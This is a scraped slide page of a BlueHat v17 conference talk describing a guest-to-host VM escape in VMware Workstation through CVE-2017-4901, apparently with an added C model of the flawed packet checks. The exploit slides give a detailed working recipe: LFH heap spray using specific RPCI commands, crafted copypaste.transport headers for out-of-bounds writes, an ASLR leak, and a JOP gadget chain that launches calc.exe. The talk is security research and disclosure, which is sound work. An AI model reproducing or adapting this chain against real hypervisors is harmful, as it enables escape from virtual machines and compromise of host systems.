Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
 
HTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation StrategiesHTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation Strategies
 
🐬 The future of MySQL is Postgres 🐘
🐬  The future of MySQL is Postgres   🐘🐬  The future of MySQL is Postgres   🐘
🐬 The future of MySQL is Postgres 🐘
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 

BlueHat v17 || Out of the Truman Show: VM Escape in VMware Gracefully

  • 1. Out of The Truman Show: VM escape in VMware gracefully. Lei Shi && Mei Wang
  • 2. About Us
    - Lei Shi is a security researcher at 360-CERT, mainly focused on cryptography security and vulnerability discovery. He has discovered 100+ bugs and gained 20+ CVEs (e.g. OpenSSL Death Alert) from OpenSSL, OpenSSH and VMware. He is obsessed with math and computer security, and is currently working on Windows Search protocol security, Linux kernel security and the development of vulnerability discovery tools.
    - Mei Wang is a security researcher in the Gear Team of Qihoo 360 Inc., mainly focused on vulnerability discovery and fuzzing technology. In the last year she gained 10+ CVEs from Firefox, Safari, Solr and libtiff. She has spoken at CanSecWest 2017 and SyScan360. She is currently working on browser security and fuzzing tool development using math and machine learning.
  • 3. Agenda
    a. Attack surface of VMware Workstation
    b. VMware RPCI and backdoor
    c. VMware Fuzz Framework
    d. CVE-2017-4901
    e. Exploit
    f. Demo
    g. Conclusion
  • 4. ① Attack surface of VMware Workstation
    - History of vulnerabilities
    - Attack surface
  • 5. ① Attack surface of VMware Workstation: vulnerability history from http://cve.mitre.org (17/10/24)
  • 6. ① Attack surface of VMware Workstation
    - VMCI (CVE-2017-4901). VMCI (VMware Virtual Machine Communication Interface) is a high-speed interface that virtual machines on the same host use to communicate with each other and with the host kernel modules. It is an optional function; if enabled, the Guest can execute commands through the vmware-vmx.exe process on the Host machine. When VMware Tools are installed in the Guest, VMCI is enabled for communication.
    - IOCTL (CVE-2014-2384). A device input and output control interface that allows applications in user space to communicate with VMkernel in kernel space.
    - COM port (CVE-2017-4908 ~ 4913). Features like the printer are implemented on top of the COM port. Many vulnerabilities have been discovered in the COM port, especially in the TrueType font parser and the JPEG2000 parser in TPView.dll.
    - Device drivers (sound card, network card, graphics card, USB…) (CVE-2017-4900)
  • 7. ② RPCI and Backdoor
    - RPCI
    - Backdoor
  • 8. ② RPCI and Backdoor
    - Backdoor: a communication mechanism between the VMware Host and Guest. Messages are sent through a special VMware I/O port. Supports multiple commands.
    - RPCI: Remote Procedure Call Interface, built on the Backdoor. The Guest can send requests to the Host: drag and drop, copy/paste… Format: <command><parameters>. vmware-vmx.exe handles every RPCI command.
  • 9. ② RPCI and Backdoor
  • 10. ② RPCI and Backdoor
  • 11. ② RPCI and Backdoor
  • 12. ② RPCI and Backdoor
  • 13. ② RPCI and Backdoor: RPCI commands
    - info-set / info-get
    - vmx.capability.unified_loop
    - tools.capability.guest_temp_directory
    - guest.upgrader_send_cmd_line_args / toolsAutoInstallGetParams
    - tools.capability.dnd_version
    - tools.capability.copypaste_version
    - vmx.capability.dnd_version
    - vmx.capability.copypaste_version
    - unity.window.contents.start
    - unity.window.contents.chunk
    - copypaste.transport
  • 14. ② RPCI and Backdoor
  • 17. ③ Fuzz Framework
    - Guest: run a backdoor command fuzzer.
    - Host:
      a) Page heap must be enabled.
      b) Inject a memory monitor to record memory use and capture out-of-bounds read/write and heap use-before-init vulnerabilities. The memory monitor delays freeing objects to capture double-free and UAF vulnerabilities.
      c) Out-of-bounds accesses to stack variables are difficult to capture, so we used Pin to handle the command-processing functions specially.
      d) A stack scanner was introduced to capture stack use-before-init vulnerabilities.
      e) Vsock was used to feed back the paths taken through some functions of interest, helping the Guest fuzzer constrain variable ranges better.
  • 18. ③ Fuzz Framework
    - UAF in "tools.capability.dnd_version": when dnd_version is set to 2, an arbitrary 0x100 bytes of data can be placed in memory; then calling the command copypaste.transport gives control of RIP and R8.
    - Continuous out-of-bounds write in "copypaste.transport": further details are discussed later.
  • 20. ④ CVE-2017-4901
    The Drag-and-Drop (DnD) function in VMware Workstation and Fusion has an out-of-bounds memory access vulnerability. This may allow a Guest to execute code on the operating system that runs Workstation or Fusion.
    - VMware Workstation Pro before 12.5.4
    - Exists in DnD version 3
    - We can control the overflow size
    - Multiple out-of-bounds writes
    - Combined with some commands, an out-of-bounds read
    - Information leak and arbitrary code execution if we place the out-of-bounds write/read before an appropriate object
  • 22. ④ CVE-2017-4901
    Checks applied to a transport packet:
    - packetSize == packet->payloadSize + DND_TRANSPORT_PACKET_HEADER_SIZE
    - packetSize <= DND_MAX_TRANSPORT_PACKET_SIZE
    - packet->payloadSize + packet->offset <= packet->totalSize
    - packet->totalSize <= DNDMSG_MAX_ARGSZ
    - The totalSize of the first packet specifies the size of the buffer allocated on the heap.
    - For the first packet, the member packet->offset must be 0.
    - All the packets in the same message must have the same seqNum.
  • 26. ⑤ Exploit
    - If we want to gain code execution, we need to overwrite a function pointer on the heap or the vtable of a C++ object.
    - Ideally, if we put the OOB write/read before an appropriate object, we can achieve both information disclosure (defeating ASLR) and arbitrary code execution.
    [diagram: vul trans block -> overflow -> info-set/get buffer -> overflow -> DnD/CP object]
  • 27. ⑤ Exploit
    LFH (Windows Low Fragmentation Heap). The LFH is used for allocations of 1 to 16368 (0x3FF0) bytes. It prevents fragmentation with a bucketing scheme in which similarly sized blocks are allocated from larger pre-allocated blocks of memory. An LFH bucket is only activated once its allocation size is detected to be popular. It is better to choose a suitable block size that is rarely used.
  • 28. ⑤ Exploit
    LFH. If we want to allocate three contiguous memory blocks (vul trans block, info-set/get block, DnD/CP object), we can follow the steps below. Note that the LFH buckets for the sizes X0, X1, Y0, Y1, Y2 are not activated beforehand.
  • 29. ⑤ Exploit
    LFH. A suitable and precise heap spray can form three contiguous memory buckets. Ideally we obtain three buckets as follows.
    [diagram: bucket n, bucket (n+1), bucket (n+2) laid out along the memory growth direction]
  • 30. ⑤ Exploit
    LFH. Free and reuse a full bucket. Under normal circumstances, because of the LFH, if we free a block and then allocate the same size again, we may not get back the block freed previously; a full bucket is the exception.
    [diagram: a full bucket; free obj X, then alloc obj Y reuses the same slot]
  • 31. ⑤ Exploit
    HeapSpray: vmx.capability.unified_loop
    Bucket1: tools.capability.guest_temp_directory 1 G000G=======
    Bucket2 (beaconStr): guest.upgrader_send_cmd_line_args G000G***************
    Bucket3 (set dndVersion 3): tools.capability.dnd_version 3; tools.capability.copypaste_version 3; vmx.capability.dnd_version; vmx.capability.copypaste_version
    Size: 0xB0 (0x10 header + 0xA0)
    [heap layout diagram: sprayed 0xB0 chunks with unique two-byte prefixes, then Bucket1 (G000G===…==GG0), Bucket2 (G000G***…***0) and Bucket3 (DnD/CP object)]
  • 32. ⑤ Exploit
    Send command "tools.capability.guest_temp_directory 1 azbo".
    [heap layout diagram: Bucket1 is now free; Bucket2 (beaconStr) and Bucket3 (DnD/CP object) are unchanged]
  • 33. ⑤ Exploit
    DnDTransportPacketHeader h1; h1.totalSize = 0xA0; h1.offset = 0; h1.payloadSize = 0x90
    Command: copypaste.transport &h1 000000000000000
    [heap layout diagram: the freed Bucket1 is reoccupied by the transport block and filled with zeros]
  • 34. ⑤ Exploit
    DnDTransportPacketHeader h1; h1.type = 3; h1.seqNum = seq; h1.totalSize = 0xA0; h1.offset = 0; h1.payloadSize = 0x90
    Command: copypaste.transport &h1 000000000000000
    [chunk diagram: the freed 0xB0 chunk = 0x10 header + 0xA0 buffer (totalSize); h1's 0x90-byte payload fills the buffer up to offset 0x90; the two following 0xB0 chunks each begin with their own 0x10 header]
  • 35. ⑤ Exploit
    DnDTransportPacketHeader h2; h2.type = h1.type = 3; h2.seqNum = h1.seqNum = seq; h2.totalSize = 0xA000; h2.offset = h1.payloadSize = 0x90; h2.payloadSize = 0x20
    Command: copypaste.transport &h2 000000000000000
    [chunk diagram: h2's 0x20-byte payload written at offset 0x90 ends at 0xB0, 0x10 bytes past the 0xA0 buffer, overwriting the 0x10-byte header of the next chunk]
  • 36. ⑤ Exploit
    h2.offset = 0x90+0x20 = 0xB0; h2.payloadSize = 0xA0+0x10 = 0xB0
    Command: copypaste.transport &h2 000000000000000
    [chunk diagram: this packet overwrites the whole next 0xB0 chunk and advances the offset to 0x160; each repetition overwrites one more 0xB0 chunk]
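The following C is an added example, not VMware's code and not from the talk: it models the packet checks listed on slide 22 and replays against them the h1/h2 headers from slides 33-35, beside a hardened variant that also bounds each write by the buffer the first packet sized. The struct layouts, the reassembly-state struct and the three constant values are assumptions made for illustration.

```c
/* Added example (not VMware's code): a model of the DnD transport packet checks
 * from slide 22, replayed with the h1/h2 headers from slides 33-35. Field and
 * constant names follow the slides; struct layouts and values are assumptions. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>
/* Assumed illustrative values; the slides do not give the real ones. */
#define DND_TRANSPORT_PACKET_HEADER_SIZE 16u
#define DND_MAX_TRANSPORT_PACKET_SIZE    0x1000u
#define DNDMSG_MAX_ARGSZ                 0x10000u

typedef struct {
    uint32_t type;
    uint32_t seqNum;
    uint32_t totalSize;   /* size of the whole message being reassembled */
    uint32_t offset;      /* where this payload lands inside the message */
    uint32_t payloadSize; /* payload bytes that follow this header */
} DnDTransportPacketHeader;

/* Per-message reassembly state (assumed shape). */
typedef struct {
    int      active;     /* set once a first packet has been accepted */
    uint32_t seqNum;
    uint32_t allocated;  /* buffer size, fixed by the first packet's totalSize */
} DnDTransportState;

enum { DND_ACCEPT = 0, DND_REJECT = -1 };

/* Decide whether a packet may be copied into the reassembly buffer.
 * hardened == 0 applies exactly the checks the slides list: a later packet's
 * offset + payloadSize is bounded only by that packet's own totalSize, never
 * by the buffer sized from the first packet.  hardened == 1 adds that bound. */
int dnd_validate_packet(DnDTransportState *st, const DnDTransportPacketHeader *p,
                        size_t packetSize, int hardened)
{
    if ((uint64_t)packetSize != (uint64_t)p->payloadSize + DND_TRANSPORT_PACKET_HEADER_SIZE)
        return DND_REJECT;
    if (packetSize > DND_MAX_TRANSPORT_PACKET_SIZE)
        return DND_REJECT;
    if ((uint64_t)p->payloadSize + p->offset > p->totalSize)
        return DND_REJECT;
    if (p->totalSize > DNDMSG_MAX_ARGSZ)
        return DND_REJECT;
    if (!st->active) {                 /* first packet: offset 0, sizes the buffer */
        if (p->offset != 0)
            return DND_REJECT;
        st->active = 1;
        st->seqNum = p->seqNum;
        st->allocated = p->totalSize;
        return DND_ACCEPT;
    }
    if (p->seqNum != st->seqNum)       /* later packets must belong to the same message */
        return DND_REJECT;
    if (hardened) {
        /* The missing bound: refuse a totalSize that disagrees with the allocation,
         * and never let offset + payloadSize exceed the buffer actually allocated. */
        if (p->totalSize != st->allocated)
            return DND_REJECT;
        if ((uint64_t)p->offset + p->payloadSize > st->allocated)
            return DND_REJECT;
    }
    return DND_ACCEPT;
}

/* Accept h1 from slides 33-34 into a fresh state. */
static int accept_h1(DnDTransportState *st, int hardened)
{
    DnDTransportPacketHeader h1 = { .type = 3, .seqNum = 1, .totalSize = 0xA0,
                                    .offset = 0, .payloadSize = 0x90 };
    memset(st, 0, sizeof *st);
    return dnd_validate_packet(st, &h1, h1.payloadSize + DND_TRANSPORT_PACKET_HEADER_SIZE, hardened);
}

/* h2 as on slide 35: totalSize 0xA000, offset 0x90, payloadSize 0x20. */
static const DnDTransportPacketHeader H2 = { .type = 3, .seqNum = 1, .totalSize = 0xA000,
                                             .offset = 0x90, .payloadSize = 0x20 };

/* Verdict on h2 after h1, under the slide-22 checks (0) or the hardened ones (1). */
int dnd_h2_verdict(int hardened)
{
    DnDTransportState st;
    if (accept_h1(&st, hardened) != DND_ACCEPT)
        return DND_REJECT;
    return dnd_validate_packet(&st, &H2, H2.payloadSize + DND_TRANSPORT_PACKET_HEADER_SIZE, hardened);
}

/* Does h2's payload end past the 0xA0-byte buffer that h1 sized? (1 = yes) */
int dnd_h2_overflows(void)
{
    DnDTransportState st;
    accept_h1(&st, 0);
    return (uint64_t)H2.offset + H2.payloadSize > st.allocated ? 1 : 0;
}

int main(void)
{
    printf("slide-22 checks: h2 %s, payload ends past buffer: %s\n",
           dnd_h2_verdict(0) == DND_ACCEPT ? "accepted" : "rejected",
           dnd_h2_overflows() ? "yes" : "no");
    printf("hardened checks: h2 %s\n", dnd_h2_verdict(1) == DND_ACCEPT ? "accepted" : "rejected");
    return 0;
}
```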
  • 37. ⑤ Exploit
    Search loop for the beacon and the object (pseudocode from the slide):
        pos = 0
        while (TRUE):
            overwrite 0xB0                          // one more copypaste.transport packet
            if (pos == 0) {
                command: ToolsAutoInstallGetParams
                Message_Receive(chan, &buf, &rsize)
                if (buf[2] == '0') {                // beaconStr (bucket 2) has been overwritten
                    pos = 0xB0
                    if (rsize > pos+4)
                        if (buf[pos+2] == 0x40 && buf[pos+3] == 0x9A)
                            calculate base address
                }
            } else {
                pos += 0xB0
                command: ToolsAutoInstallGetParams
                Message_Receive(chan, &buf, &rsize)
                if (rsize > pos+4)
                    if (buf[pos+2] == 0x40 && buf[pos+3] == 0x9A)
                        calculate base address
            }
    [memory diagram: the beaconStr chunk (G000G***…***0), followed by 0xB0 chunks [flag1][flag2]GGG…G0, then the DnD/CP object beginning [40][9A][xx][xx][xx][xx][00][00]; chunks already overwritten read back as zeros, and pos advances by 0xB0 per iteration]
  • 39. ⑤ Exploit
    Calculate base: ASLR does not affect the lowest two bytes of an address. DnD/CP object: 0x40 0x9A xx xx xx xx 00 00 ????
  • 41. ⑤ Exploit
    Layout via unity.window.contents.start and unity.window.contents.chunk:
        DnD/CP object -> [X] fixed address -> jop jop jop jop …
        Global variable area:
            [X+0x08] window_id       low 32 bits of JOP
            [X+0x0C] counter         high 32 bits of JOP
            [X+0x10] window_width    low 32 bits of original address
            [X+0x14] window_height   high 32 bits of original address
            [X+0x28] contents_base   address of string calc.exe
        [JOP]
  • 42. ⑤ Exploit
    1. Close the vmtoolsd process. To reduce interference, find the VMwareDragDetWndClass window and send it WM_CLOSE.
    2. Fill memory fragmentation. Loop 0x4A80 times; use vmx.capability.unified_loop instead of info-set for the heap spray; size 0xA0+0x10; keep the first two bytes unique.
  • 43. ⑤ Exploit
    3. Generate three full buckets. A suitable and precise heap spray can form three contiguous memory buckets. But in practice, info-set/get is unreliable: it causes multiple allocations and leaves memory holes. Use guest.upgrader_send_cmd_line_args and ToolsAutoInstallGetParams in place of info-set and info-get.
  • 44. ⑤ Exploit
    3. Generate three full buckets (continued)
       - For the first bucket, use tools.capability.guest_temp_directory to occupy the position.
       - For the second bucket, insert a readable string BeaconStr using "guest.upgrader_send_cmd_line_args".
       - For the third bucket, set up a DnD/CP version 3 object: tools.capability.dnd_version 3; tools.capability.copypaste_version 3; vmx.capability.dnd_version; vmx.capability.copypaste_version.
       - Call "tools.capability.guest_temp_directory" again to remove the first placeholder, and use the vulnerable transport block to reoccupy the first bucket.
  • 45. ⑤ Exploit
    4. Find BeaconStr. Call "copypaste.transport" to continuously overwrite the memory behind, 0xB0 bytes each time. Use ToolsAutoInstallGetParams to read the BeaconStr in the second bucket until its contents are found to have changed.
    5. Find the DnD/CP version 3 object. Call copypaste.transport to continuously overwrite the memory behind, 0xB0 bytes each time. Use ToolsAutoInstallGetParams to read the BeaconStr in the second bucket until its contents are the desired address (ASLR does not change the lowest two bytes of the address).
    6. Calculate the base address and verify that it is valid.
  • 46. ⑤ Exploit
    7. Layout. Now we have the base address, and from it we calculate the addresses we need. Call unity.window.contents.start and lay out the low 32 bits of the JOP address and of the original call address in the global variable area. Call unity.window.contents.chunk and use its counter object to push the high 32 bits of the JOP address; moreover, put the address of the string "C:\windows\system32\calc.exe" into contents_base. Final layout, if the fixed address is X:
         window_id     = X+8;     // low 32 bits of JOP address
         counter       = X+0x0C;  // high 32 bits of JOP address
         window_width  = X+0x10;  // low 32 bits of original call address
         window_height = X+0x14;  // high 32 bits of original call address
         contents_base = X+0x28;  // address of string C:\windows\system32\calc.exe
  • 47. ⑤ Exploit
    8. Overwrite the DnD/CP version 3 object. Call copypaste.transport again and overwrite 8 bytes with address X.
    9. JOP. We control R8 when "copypaste.transport" is called.
         // 47 qwords; the indices match the [r8+...] offsets used by the gadgets below
         unsigned long long jop[] = {
             j0, d0,  0, j1,  0, j2,  0,  0,   // +0: j0, +8: d0, +18h: j1, +28h: j2
             j3,  0,  0,  0, j4,  0,  0,  0,   // +40h: j3, +60h: j4
              0,  0,  0,  0,  0,  0,  0,  0,
              0,  0,  0,  0,  0,  0,  0,  0,
              0,  0,  0,  0,  0,  0,  0,  0,
              0,  0,  0, j5,  0,  0, d1        // +158h: j5, +170h: d1
         };
         Message_Send(channel, jop, sizeof(jop));

         Start = JOP_base (in step 7):
             mov  rcx, r8
             call qword ptr [r8+60h]    // to j4
         j4: mov  rdx, [r8+8]           // d0
             call qword ptr [r8]        // to j0
         j0: mov  rax, rdx
             mov  rdx, [rcx+170h]       // d1
             mov  r8, rcx
             mov  rcx, rax
             jmp  qword ptr [r8+158h]   // to j5
         j5: mov  [rdx+28h], rax
             jmp  qword ptr [r8+18h]    // to j1
         j1: pop  rdi
             jmp  qword ptr [r8+28h]    // to j2
         j2: pop  rdi
             jmp  qword ptr [r8+40h]    // to j3
         j3: xxx
  • 48. ⑤ Exploit
    10. Recovery. Reverse the JOP operations of the previous step.
  • 52. ⑦ Conclusion
    - The success rate of our exploit exceeds 95% (96.7%).
    - No pwn, no fun.